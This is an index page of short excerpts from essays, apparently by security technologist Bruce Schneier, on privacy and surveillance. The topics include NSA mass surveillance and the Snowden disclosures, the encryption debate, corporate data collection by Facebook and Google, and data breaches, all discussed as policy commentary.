Essays in the Category “Privacy and Surveillance”
Mark Zuckerberg wants to fix the social network. Here’s what he’ll need to do.
Facebook is making a new and stronger commitment to privacy. Last month, the company hired three of its most vociferous critics and installed them in senior technical positions. And on Wednesday, Mark Zuckerberg wrote that the company will pivot to focus on private conversations over the public sharing that has long defined the platform, even while conceding that "frankly we don't currently have a strong reputation for building privacy protective services."
There is ample reason to question Zuckerberg's pronouncement: The company has made—and broken—many privacy promises over the years. And if you read his 3,000-word post carefully, Zuckerberg says nothing about changing Facebook's surveillance capitalism business model.
The so-called Crypto Wars have been going on for 25 years now. Basically, the FBI—and some of their peer agencies in the U.K., Australia, and elsewhere—argue that the pervasive use of civilian encryption is hampering their ability to solve crimes and that they need the tech companies to make their systems susceptible to government eavesdroping. Sometimes their complaint is about communications systems, like voice or messaging apps. Sometimes it's about end-user devices.
Excerpted from the upcoming issue of McSweeney's, "The End of Trust," a collection featuring more than 30 writers investigating surveillance, technology, and privacy.
In my book Data and Goliath, I write about the value of privacy. I talk about how it is essential for political liberty and justice, and for commercial fairness and equality. I talk about how it increases personal freedom and individual autonomy, and how the lack of it makes us all less secure. But this is probably the most important argument as to why society as a whole must protect privacy: it allows society to progress.
Internet censors have a new strategy in their bid to block applications and websites: pressuring the large cloud providers that host them. These providers have concerns that are much broader than the targets of censorship efforts, so they have the choice of either standing up to the censors or capitulating in order to maximize their business. Today's internet largely reflects the dominance of a handful of companies behind the cloud services, search engines and mobile platforms that underpin the technology landscape. This new centralization radically tips the balance between those who want to censor parts of the internet and those trying to evade censorship.
When Marc Zuckerberg testified before both the House and the Senate last month, it became immediately obvious that few US lawmakers had any appetite to regulate the pervasive surveillance taking place on the internet.
Right now, the only way we can force these companies to take our privacy more seriously is through the market. But the market is broken. First, none of us do business directly with these data brokers.
Last week, researchers disclosed vulnerabilities in a large number of encrypted email clients: specifically, those that use OpenPGP and S/MIME, including Thunderbird and AppleMail. These are serious vulnerabilities: An attacker who can alter mail sent to a vulnerable client can trick that client into sending a copy of the plaintext to a web server controlled by that attacker. The story of these vulnerabilities and the tale of how they were disclosed illustrate some important lessons about security vulnerabilities in general and email security in particular.
But first, if you use PGP or S/MIME to encrypt email, you need to check the list on this page and see if you are vulnerable. If you are, check with the vendor to see if they've fixed the vulnerability.
In the wake of the Cambridge Analytica scandal, news articles and commentators have focused on what Facebook knows about us. A lot, it turns out. It collects data from our posts, our likes, our photos, things we type and delete without posting, and things we do while not on Facebook and even when we're offline. It buys data about us from others.
This essay appeared as half of a point/counterpoint with Priscilla Regan, in a CQ Researcher report on Privacy and the Internet.
Everything online is hackable. This is true for Equifax's data and the federal Office of Personal Management's data, which was hacked in 2015. If information is on a computer connected to the internet, it is vulnerable.
But just because everything is hackable doesn't mean everything will be hacked.
What the battle looks like after Section 702's reauthorization
For over a decade, civil libertarians have been fighting government mass surveillance of innocent Americans over the Internet. We've just lost an important battle. On Jan. 18, when President Trump signed the renewal of Section 702, domestic mass surveillance became effectively a permanent part of U.S. law.
The cellphones we carry with us constantly are the most perfect surveillance device ever invented, and our laws haven't caught up to that reality. That might change soon.
This week, the Supreme Court will hear a case with profound implications for your security and privacy in the coming years. The Fourth Amendment's prohibition of unlawful search and seizure is a vital right that protects us all from police overreach, and the way the courts interpret it is increasingly nonsensical in our computerized and networked world.
Testimony and Statement for the Record of Bruce Schneier
Fellow and Lecturer, Belfer Center for Science and International Affairs, Harvard Kennedy School
Fellow, Berkman Center for Internet and Society at Harvard Law School
Hearing on "Securing Consumers' Credit Data in the Age of Digital Commerce"
Subcommittee on Digital Commerce and Consumer Protection
Committee on Energy and Commerce
United States House of Representatives
1 November 2017
2125 Rayburn House Office Building
Washington, DC 20515
Mister Chairman and Members of the Committee, thank you for the opportunity to testify today concerning the security of credit data. My name is Bruce Schneier, and I am a security technologist. For over 30 years I have studied the technologies of security and privacy. I have authored 13 books on these subjects, including Data and Goliath: The Hidden Battles to Collect Your Data and Control Your World (Norton, 2015).
There's something going on inside the intelligence communities in at least two countries, and we have no idea what it is.
Consider these three data points. One: someone, probably a country's intelligence organization, is dumping massive amounts of cyberattack tools belonging to the NSA onto the Internet. Two: someone else, or maybe the same someone, is doing the same thing to the CIA.
Weakness in digital communications systems allows security to be bypassed, leaving users at risk of being spied on.
Governments want to spy on their citizens for all sorts of reasons. Some countries do it to help solve crimes or to try to find "terrorists" before they act.
Others do it to find and arrest reporters or dissidents. Some only target individuals, others attempt to spy on everyone all the time.
Think about all of the websites you visit every day. Now imagine if the likes of Time Warner, AT&T and Verizon collected all of your browsing history and sold it on to the highest bidder. That's what will probably happen if Congress has its way.
This week, lawmakers voted to allow internet service providers to violate your privacy for their own profit.
Don't get doxed.
This essay also appeared in The Age.
A decade ago, I wrote about the death of ephemeral conversation. As computers were becoming ubiquitous, some unintended changes happened, too: Before computers, what we said disappeared once we'd said it. Neither face-to-face conversations nor telephone conversations were routinely recorded.
In today's world of ubiquitous computers and networks, it's hard to overstate the value of encryption. Quite simply, encryption keeps you safe. Encryption protects your financial details and passwords when you bank online. It protects your cell phone conversations from eavesdroppers.
Writing a magazine column is always an exercise in time travel. I'm writing these words in early December. You're reading them in February. This means anything that's news as I write this will be old hat in two months, and anything that's news to you hasn't happened yet as I'm writing.
Thefts of personal information aren't unusual. Every week, thieves break into networks and steal data about people, often tens of millions at a time. Most of the time it's information that's needed to commit fraud, as happened in 2015 to Experian and the IRS.
Sometimes it's stolen for purposes of embarrassment or coercion, as in the 2015 cases of Ashley Madison and the U.S.
Either everyone gets security, or no one does.
Earlier this week, a federal magistrate ordered Apple to assist the FBI in hacking into the iPhone used by one of the San Bernardino shooters. Apple will fight this order in court.
The policy implications are complicated. The FBI wants to set a precedent that tech companies will assist law enforcement in breaking their users' security, and the technology community is afraid that the precedent will limit what sorts of security features it can offer customers.
Advertising in the 2016 election is going to be highly personalized, targeting voters’ personal information to sway their decisions
This presidential election, prepare to be manipulated.
In politics, as in the marketplace, you are the consumer. But you only have one vote to "spend" per election, and in November you'll almost always only have two possible candidates on which to spend it.
In every election, both of those candidates are going to pull every trick in the surveillance-driven, highly personalized internet advertising world to get you to vote for them.
Both the "going dark" metaphor of FBI Director James Comey and the contrasting "golden age of surveillance" metaphor of privacy law professor Peter Swire focus on the value of data to law enforcement. As framed in the media, encryption debates are about whether law enforcement should have surreptitious access to data, or whether companies should be allowed to provide strong encryption to their customers.
It's a myopic framing that focuses only on one threat—criminals, including domestic terrorists—and the demands of law enforcement and national intelligence. This obscures the most important aspects of the encryption issue: the security it provides against a much wider variety of threats.
Many technological security failures of today can be traced to failures of encryption. In 2014 and 2015, unnamed hackers—probably the Chinese government—stole 21.5 million personal files of U.S. government employees and others. They wouldn't have obtained this data if it had been encrypted.
SilverPush is an Indian startup that's trying to figure out all the different computing devices you own. It embeds inaudible sounds into the webpages you read and the television commercials you watch. Software secretly embedded in your computers, tablets, and smartphones picks up the signals, and then use scookies to transmit that information back to SilverPush. The result is that the company can track you across your different devices. It can correlate the television commercials you watch with the web searches you make.
China is considering a new "social credit" system, designed to rate everyone's trustworthiness. Many fear that it will become a tool of social control—but in reality it has a lot in common with the algorithms and systems that score and classify us all every day.
Human judgment is being replaced by automatic algorithms, and that brings with it both enormous benefits and risks. The technology is enabling a new form of social control, sometimes deliberately and sometimes as a side effect.
ID checks were a common response to the terrorist attacks of 9/11, but they'll soon be obsolete. You won't have to show your ID, because you'll be identified automatically. A security camera will capture your face, and it'll be matched with your name and a whole lot of other information besides. Welcome to the world of automatic facial recognition.
Last month, a Kentucky man shot down a drone that was hovering near his backyard.
WDRB News reported that the camera drone's owners soon showed up at the home of the shooter, William H. Merideth: "Four guys came over to confront me about it, and I happened to be armed, so that changed their minds," Merideth said. "They asked me, 'Are you the S-O-B that shot my drone?' and I said, 'Yes I am,'" he said. "I had my 40 mm Glock on me and they started toward me and I told them, 'If you cross my sidewalk, there's gonna be another shooting.'" Police charged Meredith with criminal mischief and wanton endangerment.
The doxing of Ashley Madison reveals an uncomfortable truth: In the age of cloud computing, everyone is vulnerable.
Most of us get to be thoroughly relieved that our emails weren't in the Ashley Madison database. But don't get too comfortable. Whatever secrets you have, even the ones you don't think of as secret, are more likely than you think to get dumped on the Internet. It's not your fault, and there's largely nothing you can do about it.
Encryption protects our data. It protects our data when it’s sitting on our computers and in data centres, and it protects it when it's being transmitted around the Internet. It protects our conversations, whether video, voice, or text. It protects our privacy.
Last weekend, the Sunday Times published a front-page story (full text here), citing anonymous British sources claiming that both China and Russia have copies of the Snowden documents. It's a terrible article, filled with factual inaccuracies and unsubstantiated claims about both Snowden's actions and the damage caused by his disclosure, and others have thoroughly refuted the story. I want to focus on the actual question: Do countries like China and Russia have copies of the Snowden documents?
I believe the answer is certainly yes, but that it's almost certainly not Snowden's fault.
From TVs that listen in on us to a doll that records your child’s questions, data collection has become both dangerously intrusive and highly profitable. Is it time for governments to act to curb online surveillance?
Last year, when my refrigerator broke, the repair man replaced the computer that controls it. I realised that I had been thinking about the refrigerator backwards: it's not a refrigerator with a computer, it's a computer that keeps food cold. Just like that, everything is turning into a computer. Your phone is a computer that makes calls.
What's your electronic data worth to you? What is it worth to others? And what's the dividing line between your privacy and your convenience? These are questions Bruce Schneier thinks a lot about, and as he shows in Data and Goliath, they are questions which have an impact on where society and technology are going next.
Data and Goliath is a book about surveillance, both government and corporate. It's an exploration in three parts: what's happening, why it matters, and what to do about it.
In December Google's Executive Chairman Eric Schmidt was interviewed at the CATO Institute Surveillance Conference. One of the things he said, after talking about some of the security measures his company has put in place post-Snowden, was: "If you have important information, the safest place to keep it is in Google. And I can assure you that the safest place to not keep it is anywhere else."
The surprised me, because Google collects all of your information to show you more targeted advertising. Surveillance is the business model of the Internet, and Google is one of the most successful companies at that. To claim that Google protects your privacy better than anyone else is to profoundly misunderstand why Google stores your data for free in the first place.
German translation by Damian Weber
Earlier this week, we learned that Samsung televisions are eavesdropping on their owners. If you have one of their Internet-connected smart TVs, you can turn on a voice command feature that saves you the trouble of finding the remote, pushing buttons and scrolling through menus. But making that feature work requires the television to listen to everything you say. And what you say isn't just processed by the television; it may be forwarded over the Internet for remote processing.
Thousands of articles have called the December attack against Sony Pictures a wake-up call to industry. Regardless of whether the attacker was the North Korean government, a disgruntled former employee, or a group of random hackers, the attack showed how vulnerable a large organization can be and how devastating the publication of its private correspondence, proprietary data, and intellectual property can be.
But while companies are supposed to learn that they need to improve their security against attack, there's another equally important but much less discussed lesson here: companies should have an aggressive deletion policy.
One of the social trends of the computerization of our business and social communications tools is the loss of the ephemeral.
Those of you unfamiliar with hacker culture might need an explanation of “doxing.”
The word refers to the practice of publishing personal information about people without their consent. Usually it’s things like an address and phone number, but it can also be credit card details, medical information, private e-mails—pretty much anything an assailant can get his hands on.
Doxing is not new; the term dates back to 2001 and the hacker group Anonymous. But it can be incredibly offensive. In 2014, several women were doxed by male gamers trying to intimidate them into keeping silent about sexism in computer games.
A focused, skillful cyber attacker will always get in, warns a security expert.
Earlier this month, a mysterious group that calls itself Guardians of Peace hacked into Sony Pictures Entertainment's computer systems and began revealing many of the Hollywood studio's best-kept secrets, from details about unreleased movies to embarrassing emails (notably some racist notes from Sony bigwigs about President Barack Obama's presumed movie-watching preferences) to the personnel data of employees, including salaries and performance reviews. The Federal Bureau of Investigation now says it has evidence that North Korea was behind the attack, and Sony Pictures pulled its planned release of "The Interview," a satire targeting that country's dictator, after the hackers made some ridiculous threats about terrorist violence.
Your reaction to the massive hacking of such a prominent company will depend on whether you're fluent in information-technology security. If you're not, you're probably wondering how in the world this could happen.
First we thought North Korea was behind the Sony cyberattacks. Then we thought it was a couple of hacker guys with an axe to grind. Now we think North Korea is behind it again, but the connection is still tenuous. There have been accusations of cyberterrorism, and even cyberwar.
A warrantless FBI search in Las Vegas sets a troubling precedent.
The next time you call for assistance because the Internet service in your home is not working, the 'technician' who comes to your door may actually be an undercover government agent. He will have secretly disconnected the service, knowing that you will naturally call for help and—when he shows up at your door, impersonating a technician—let him in. He will walk through each room of your house, claiming to diagnose the problem. Actually, he will be videotaping everything (and everyone) inside.
German translation by Yuri Samoilov
There's a new international survey on Internet security and trust, of '23,376 Internet users in 24 countries,' including 'Australia, Brazil, Canada, China, Egypt, France, Germany, Great Britain, Hong Kong, India, Indonesia, Italy, Japan, Kenya, Mexico, Nigeria, Pakistan, Poland, South Africa, South Korea, Sweden, Tunisia, Turkey and the United States.' Amongst the findings, 60% of Internet users have heard of Edward Snowden, and 39% of those 'have taken steps to protect their online privacy and security as a result of his revelations.'
The press is mostly spinning this as evidence that Snowden has not had an effect: 'merely 39%,' 'only 39%,' and so on. (Note that these articles are completely misunderstanding the data. It's not 39% of people who are taking steps to protect their privacy post-Snowden, it's 39% of the 60% of Internet users—which is not everybody—who have heard of him. So it's much less than 39%.)
Even so, I disagree with the 'Edward Snowden Revelations Not Having Much Impact on Internet Users' headline.
In the Internet age, we have no choice but to entrust our data with private companies: e-mail providers, service providers, retailers, and so on.
We realize that this data is at risk from hackers. But there's another risk as well: the employees of the companies who are holding our data for us.
In the early years of Facebook, employees had a master password that enabled them to view anything they wanted in any account.
There's a debate going on about whether the U.S. government—specifically, the NSA and United States Cyber Command—should stockpile Internet vulnerabilities or disclose and fix them. It's a complicated problem, and one that starkly illustrates the difficulty of separating attack and defense in cyberspace.
A software vulnerability is a programming mistake that allows an adversary access into that system.
According to NSA documents published in Glenn Greenwald's new book "No Place to Hide," we now know that the NSA spies on embassies and missions all over the world, including those of Brazil, Bulgaria, Colombia, the European Union, France, Georgia, Greece, India, Italy, Japan, Mexico, Slovakia, South Africa, South Korea, Taiwan, Venezuela and Vietnam.
This will certainly strain international relations, as happened when it was revealed that the United States is eavesdropping on German Chancellor Angela Merkel's cell phone—but is anyone really surprised? Spying on foreign governments is what the NSA is supposed to do. Much more problematic, and dangerous, is that the NSA spies on entire populations.
In addition to turning the Internet into a worldwide surveillance platform, the NSA has surreptitiously weakened the products, protocols, and standards we all use to protect ourselves. By doing so, it has destroyed the trust that underlies the Internet. We need that trust back.
Trust is inherently social.
Ephemeral messaging apps such as Snapchat, Wickr and Frankly, all of which advertise that your photo, message or update will only be accessible for a short period, are on the rise. Snapchat and Frankly, for example, claim they permanently delete messages, photos and videos after 10 seconds. After that, there's no record.
This notion is especially popular with young people, and these apps are an antidote to sites such as Facebook where everything you post lasts forever unless you take it down—and taking it down is no guarantee that it isn't still available.
Don’t Listen to Google and Facebook: The Public-Private Surveillance Partnership Is Still Going Strong
And real corporate security is still impossible.
If you've been reading the news recently, you might think that corporate America is doing its best to thwart NSA surveillance.
Google just announced that it is encrypting Gmail when you access it from your computer or phone, and between data centers. Last week, Mark Zuckerberg personally called President Obama to complain about the NSA using Facebook as a means to hack computers, and Facebook's Chief Security Officer explained to reporters that the attack technique has not worked since last summer. Yahoo, Google, Microsoft, and others are now regularly publishing "transparency reports," listing approximately how many government data requests the companies have received and complied with.
Back when we first started getting reports of the Chinese breaking into U.S. computer networks for espionage purposes, we described it in some very strong language. We called the Chinese actions cyber-attacks. We sometimes even invoked the word cyberwar, and declared that a cyber-attack was an act of war.
Ever since reporters began publishing stories about NSA activities, based on documents provided by Edward Snowden, we've been repeatedly assured by government officials that it's "only metadata." This might fool the average person, but it shouldn't fool those of us in the security field. Metadata equals surveillance data, and collecting metadata on people means putting them under surveillance.
An easy thought experiment demonstrates this. Imagine that you hired a private detective to eavesdrop on a subject.
Increasingly, we are watched not by people but by algorithms. Amazon and Netflix track the books we buy and the movies we stream, and suggest other books and movies based on our habits. Google and Facebook watch what we do and what we say, and show us advertisements based on our behavior. Google even modifies our web search results based on our previous behavior.
The NSA has become too big and too powerful. What was supposed to be a single agency with a dual mission—protecting the security of U.S. communications and eavesdropping on the communications of our enemies—has become unbalanced in the post-Cold War, all-terrorism-all-the-time era.
Putting the U.S.
Giving it to private companies will only make privacy intrusion worse.
One of the recommendations by the president's Review Group on Intelligence and Communications Technologies on reforming the National Security Agency—No. 5, if you're counting—is that the government should not collect and store telephone metadata. Instead, a private company—either the phone companies themselves or some other third party—should store the metadata and provide it to the government only upon a court order.
This isn't a new idea. Over the past decade, several countries have enacted mandatory data retention laws, in which companies are required to save Internet or telephony data about customers for a specified period of time, in case the government needs it for an investigation.
Glenn Greenwald is back reporting about the NSA, now with Pierre Omidyar's news organization FirstLook and its introductory publication, The Intercept. Writing with national security reporter Jeremy Scahill, his first article covers how the NSA helps target individuals for assassination by drone.
Leaving aside the extensive political implications of the story, the article and the NSA source documents reveal additional information about how the agency's programs work. From this and other articles, we can now piece together how the NSA tracks individuals in the real world through their actions in cyberspace.
Secret NSA eavesdropping is still in the news. Details about once secret programs continue to leak. The Director of National Intelligence has recently declassified additional information, and the President's Review Group has just released its report and recommendations.
With all this going on, it's easy to become inured to the breadth and depth of the NSA's activities.
Google recently announced that it would start including individual users' names and photos in some ads. This means that if you rate some product positively, your friends may see ads for that product with your name and photo attached—without your knowledge or consent. Meanwhile, Facebook is eliminating a feature that allowed people to retain some portions of their anonymity on its website.
These changes come on the heels of Google's move to explore replacing tracking cookies with something that users have even less control over.
The public/private surveillance partnership between the NSA and corporate data collectors is starting to fray. The reason is sunlight. The publicity resulting from the Snowden documents has made companies think twice before allowing the NSA access to their users' and customers' data.
Pre-Snowden, there was no downside to cooperating with the NSA.
In the Information Age, it's easier than ever to steal and publish data. Corporations and governments have to adjust to their secrets being exposed, regularly.
When massive amounts of government documents are leaked, journalists sift through them to determine which pieces of information are newsworthy, and confer with government agencies over what needs to be redacted.
Managing this reality is going to require that governments actively engage with members of the press who receive leaked secrets, helping them secure those secrets—even while being unable to prevent them from publishing.
Distributed citizen groups and nimble hackers once had the edge. Now governments and corporations are catching up. Who will dominate in the decades ahead?
We're in the middle of an epic battle for power in cyberspace. On one side are the traditional, organized, institutional powers such as governments and large multinational corporations. On the other are the distributed and nimble: grassroots movements, dissident groups, hackers, and criminals. Initially, the Internet empowered the second side.
The basic government defense of the NSA's bulk-collection programs—whether it be the list of all the telephone calls you made, your email address book and IM buddy list, or the messages you send your friends—is that what the agency is doing is perfectly legal, and doesn't really count as surveillance, until a human being looks at the data.
It's what Director of National Intelligence James R. Clapper meant when he lied to Congress. When asked, "Does the NSA collect any type of data at all on millions or hundreds of millions of Americans?" he replied, "No sir, not wittingly." To him, the definition of "collect" requires that a human look at it. So when the NSA collects—using the dictionary definition of the word—data on hundreds of millions of Americans, it's not really collecting it, because only computers process it.
We already know the NSA wants to eavesdrop on the internet. It has secret agreements with telcos to get direct access to bulk internet traffic. It has massive systems like TUMULT, TURMOIL, and TURBULENCE to sift through it all. And it can identify ciphertext—encrypted information—and figure out which programs could have created it.
Historically, surveillance was difficult and expensive.
Over the decades, as technology advanced, surveillance became easier and easier. Today, we find ourselves in a world of ubiquitous surveillance, where everything is collected, saved, searched, correlated and analyzed.
But while technology allowed for an increase in both corporate and government surveillance, the private and public sectors took very different paths to get there.
Since I started working with Snowden's documents, I have been using a number of tools to try to stay secure from the NSA. The advice I shared included using Tor, preferring certain cryptography over others, and using public-domain encryption wherever possible.
I also recommended using an air gap, which physically isolates a computer or local network of computers from the internet. (The name comes from the literal gap of air between the computer and the internet; the word predates wireless networks.)
But this is more complicated than it sounds, and requires explanation.
The National Security Agency has made repeated attempts to develop attacks against people using Tor, a popular tool designed to protect online anonymity, despite the fact the software is primarily funded and promoted by the US government itself.
Top-secret NSA documents, disclosed by whistleblower Edward Snowden, reveal that the agency's current successes against Tor rely on identifying users and then attacking vulnerable software on their computers. One technique developed by the agency targeted the Firefox web browser used with Tor, giving the agency full control over targets' computers, including access to files, all keystrokes and all online activity.
But the documents suggest that the fundamental security of the Tor service remains intact.
Secret servers and a privileged position on the internet's backbone used to identify users and attack target computers
The online anonymity network Tor is a high-priority target for the National Security Agency. The work of attacking Tor is done by the NSA's application vulnerabilities branch, which is part of the systems intelligence directorate, or SID. The majority of NSA employees work in SID, which is tasked with collecting data from communications systems around the world.
According to a top-secret NSA presentation provided by the whistleblower Edward Snowden, one successful technique the NSA has developed involves exploiting the Tor browser bundle, a collection of programs designed to make it easy for people to install and use the software.
By reporting on the agency's actions, the vulnerabilities in our computer systems can be fixed. It's the only way to force change
Today, the Guardian is reporting on how the NSA targets Tor users, along with details of how it uses centrally placed servers on the internet to attack individual computers. This builds on a Brazilian news story from last week that, in part, shows that the NSA is impersonating Google servers to users; a German story on how the NSA is hacking into smartphones; and a Guardian story from two weeks ago on how the NSA is deliberately weakening common security algorithms, protocols, and products.
The common thread among these stories is that the NSA is subverting the internet and turning it into a massive surveillance tool. The NSA's actions are making us all less safe, because its eavesdropping mission is degrading its ability to protect the US.
As I report in The Guardian today, the NSA has secret servers on the Internet that hack into other computers, codename FOXACID. These servers provide an excellent demonstration of how the NSA approaches risk management, and exposes flaws in how the agency thinks about the secrecy of its own programs.
Here are the FOXACID basics: By the time the NSA tricks a target into visiting one of those servers, it already knows exactly who that target is, who wants him eavesdropped on, and the expected value of the data it hopes to receive. Based on that information, the server can automatically decide what exploit to serve the target, taking into account the risks associated with attacking the target, as well as the benefits of a successful attack.
The nation can survive the occasional terrorist attack, but our freedoms can't survive an invulnerable leader like Keith Alexander operating within inadequate constraints.
Leaks from the whistleblower Edward Snowden have catapulted the NSA into newspaper headlines and demonstrated that it has become one of the most powerful government agencies in the country. From the secret court rulings that allow it to collect data on all Americans to its systematic subversion of the entire Internet as a surveillance platform, the NSA has amassed an enormous amount of power.
There are two basic schools of thought about how this came to pass. The first focuses on the agency's power.
We recently learned that U.S. intelligence agencies had at least three days' warning that Syrian President Bashar al-Assad was preparing to launch a chemical attack on his own people, but wasn't able to stop it. At least that's what an intelligence briefing from the White House reveals. With the combined abilities of our national intelligence apparatus—the CIA, National Security Agency, National Reconnaissance Office and all the rest—it's not surprising that we had advance notice.
The NSA has huge capabilities – and if it wants in to your computer, it's in. With that in mind, here are five ways to stay safe
Now that we have enough details about how the NSA eavesdrops on the internet, including today's disclosures of the NSA's deliberate weakening of cryptographic systems, we can finally start to figure out how to protect ourselves.
For the past two weeks, I have been working with the Guardian on NSA stories, and have read hundreds of top-secret NSA documents provided by whistleblower Edward Snowden. I wasn't part of today's story—it was in process well before I showed up—but everything I read confirms what the Guardian is reporting.
At this point, I feel I can provide some advice for keeping secure against such an adversary.
The NSA has undermined a fundamental social contract. We engineers built the internet – and now we have to fix it
Government and industry have betrayed the internet, and us.
By subverting the internet at every level to make it a vast, multi-layered and robust surveillance platform, the NSA has undermined a fundamental social contract. The companies that build and manage our internet infrastructure, the companies that create and sell us our hardware and software, or the companies that host our data: we can no longer trust them to be ethical internet stewards.
This is not the internet the world needs, or the internet its creators envisioned.
Big-government secrets require a lot of secret-keepers. As of October 2012, almost 5m people in the US have security clearances, with 1.4m at the top-secret level or higher, according to the Office of the Director of National Intelligence.
Most of these people do not have access to as much information as Edward Snowden, the former National Security Agency contractor turned leaker, or even Chelsea Manning, the former US army soldier previously known as Bradley who was convicted for giving material to WikiLeaks. But a lot of them do—and that may prove the Achilles heel of government.
The latest Snowden document is the US intelligence 'black budget.' There's a lot of information in the few pages the Washington Post decided to publish, including an introduction by Director of National Intelligence James Clapper. In it, he drops a tantalizing hint: 'Also, we are investing in groundbreaking cryptanalytic capabilities to defeat adversarial cryptography and exploit internet traffic.'
Honestly, I'm skeptical. Whatever the NSA has up its top-secret sleeves, the mathematics of cryptography will still be the most secure part of any encryption system. I worry a lot more about poorly designed cryptographic products, software bugs, bad passwords, companies that collaborate with the NSA to leak all or part of the keys, and insecure computers and networks.
I've recently seen two articles speculating on the NSA's capability, and practice, of spying on members of Congress and other elected officials. The evidence is all circumstantial and smacks of conspiracy thinking—and I have no idea whether any of it is true or not—but it's a good illustration of what happens when trust in a public institution fails.
The NSA has repeatedly lied about the extent of its spying program. James R. Clapper, the director of national intelligence, has lied about it to Congress.
We Need Protection from Intelligence-Gathering Run Amok
This essay also appeared in the Livingston Daily and the Daily Journal.
If there's any confirmation that the U.S. government has commandeered the Internet for worldwide surveillance, it is what happened with Lavabit earlier this month.
Lavabit is—well, was—an e-mail service that offered more privacy than the typical large-Internet-corporation services that most of us use.
The scariest explanation of all? That the NSA and GCHQ are just showing they don't want to be messed with.
Last Sunday, David Miranda was detained while changing planes at London Heathrow Airport by British authorities for nine hours under a controversial British law—the maximum time allowable without making an arrest. There has been much made of the fact that he's the partner of Glenn Greenwald, the Guardian reporter whom Edward Snowden trusted with many of his NSA documents and the most prolific reporter of the surveillance abuses disclosed in those documents. There's less discussion of what I feel was the real reason for Miranda's detention. He was ferrying documents between Greenwald and Laura Poitras, a filmmaker and his co-reporter on Snowden and his information.
Technology companies have to fight for their users, or they'll eventually lose them.
It turns out that the NSA's domestic and world-wide surveillance apparatus is even more extensive than we thought. Bluntly: The government has commandeered the Internet. Most of the largest Internet companies provide information to the NSA, betraying their users. Some, as we've learned, fight and lose.
In July 2012, responding to allegations that the video-chat service Skype—owned by Microsoft—was changing its protocols to make it possible for the government to eavesdrop on users, Corporate Vice President Mark Gillett took to the company's blog to deny it.
Turns out that wasn't quite true.
Or at least he—or the company's lawyers—carefully crafted a statement that could be defended as true while completely deceiving the reader. You see, Skype wasn't changing its protocols to make it possible for the government to eavesdrop on users, because the government was already able to eavesdrop on users.
At a Senate hearing in March, Director of National Intelligence James Clapper assured the committee that his agency didn't collect data on hundreds of millions of Americans.
This essay also appeared in The Memphis Commercial Appeal, Stuff, The Guardian Comment Is Free, and Veterans Today.
Imagine the government passed a law requiring all citizens to carry a tracking device. Such a law would immediately be found unconstitutional. Yet we all carry mobile phones.
Edward Snowden broke the law by releasing classified information. This isn't under debate; it's something everyone with a security clearance knows. It's written in plain English on the documents you have to sign when you get a security clearance, and it's part of the culture. The law is there for a good reason, and secrecy has an important role in military defense.
The NSA's surveillance of cell-phone calls show how badly we need to protect the whistle-blowers who provide transparency and accountability.
Yesterday, we learned that the NSA received all calling records from Verizon customers for a three-month period starting in April. That's everything except the voice content: who called who, where they were, how long the call lasted—for millions of people, both Americans and foreigners. This "metadata" allows the government to track the movements of everyone during that period, and build a detailed picture of who talks to whom. It's exactly the same data the Justice Department collected about AP journalists.
The FBI wants a new law that will make it easier to wiretap the Internet. Although its claim is that the new law will only maintain the status quo, it's really much worse than that. This law will result in less-secure Internet products and create a foreign industry in more-secure alternatives. It will impose costly burdens on affected companies.
The internet has turned into a massive surveillance tool. We're constantly monitored on the internet by hundreds of companies—both familiar and unfamiliar. Everything we do there is recorded, collected, and collated—sometimes by corporations wanting to sell us stuff and sometimes by governments wanting to keep an eye on us.
Ephemeral conversation is over.
A new bill moving through Congress would give the authorities unprecedented access to citizens' information.
Our government collects a lot of information about us. Tax records, legal records, license records, records of government services received--it's all in databases that are increasingly linked and correlated. Still, there's a lot of personal information the government can't collect. Either they're prohibited by law from asking without probable cause and a judicial order, or they simply have no cost-effective way to collect it.
I'm going to start with three data points.
One: Some of the Chinese military hackers who were implicated in a broad set of attacks against the U.S. government and corporations were identified because they accessed Facebook from the same network infrastructure they used to carry out their attacks.
Two: Hector Monsegur, one of the leaders of the LulzSac hacker movement, was identified and arrested last year by the FBI.
Security Has Become a For-Profit Business
This is an edited version of a longer essay.
It's a new day for the New York Police Department, with technology increasingly informing the way cops do their jobs. With innovation come new possibilities, but also new concerns.
For one, the NYPD is testing a security apparatus that uses terahertz radiation to detect guns under clothing from a distance. As Police Commissioner Ray Kelly explained back in January, "If something is obstructing the flow of that radiation, for example a weapon, the device will highlight that object."
Ignore, for a moment, the glaring constitutional concerns, which make the stop-and-frisk debate pale in comparison: virtual strip-searching, evasion of probable cause, potential profiling.
Whether it's Syria using Facebook to help identify and arrest dissidents or China using its "Great Firewall" to limit access to international news throughout the country, repressive regimes all over the world are using the Internet to more efficiently implement surveillance, censorship, propaganda, and control. They're getting really good at it, and the IT industry is helping. We're helping by creating business applications -- categories of applications, really -- that are being repurposed by oppressive governments for their own use:
- What is called censorship when practiced by a government is content filtering when practiced by an organization. Many companies want to keep their employees from viewing porn or updating their Facebook pages while at work.
Internet Eyes is a U.K. startup designed to crowdsource digital surveillance. People pay a small fee to become a "Viewer." Once they do, they can log onto the site and view live anonymous feeds from surveillance cameras at retail stores. If they notice someone shoplifting, they can alert the store owner.
On Monday, The New York Times reported that President Obama will seek sweeping laws enabling law enforcement to more easily eavesdrop on the internet. Technologies are changing, the administration argues, and modern digital systems aren't as easy to monitor as traditional telephones.
The government wants to force companies to redesign their communications systems and information networks to facilitate surveillance, and to provide law enforcement with back doors that enable them to bypass any security measures.
The proposal may seem extreme, but -- unfortunately -- it's not unique.
As networking sites become more ubiquitous, it is long past the time to look at the types of data we put on those sites. We're using social networking websites for more private and more intimate interactions, often without thinking through the privacy implications of what we're doing.
The issues are hard and the solutions to them harder still, but I'm seeing a lot of confusion in even forming the questions.
Social networking sites deal with several different types of user data, and it's essential to separate them.
Lately I've been reading about user security and privacy -- control, really -- on social networking sites. The issues are hard and the solutions harder, but I'm seeing a lot of confusion in even forming the questions. Social networking sites deal with several different types of user data, and it's essential to separate them.
Below is my taxonomy of social networking data, which I first presented at the Internet Governance Forum meeting last November, and again -- revised -- at an OECD workshop on the role of Internet intermediaries in June.
This essay previously appeared in Information Security as the first half of a point-counterpoint with Marcus Ranum. Marcus's half is here.
Universal identification is portrayed by some as the holy grail of Internet security. Anonymity is bad, the argument goes; and if we abolish it, we can ensure only the proper people have access to their own information. We'll know who is sending us spam and who is trying to hack into corporate networks.
These companies and others say privacy erosion is inevitable--but they're making it so.
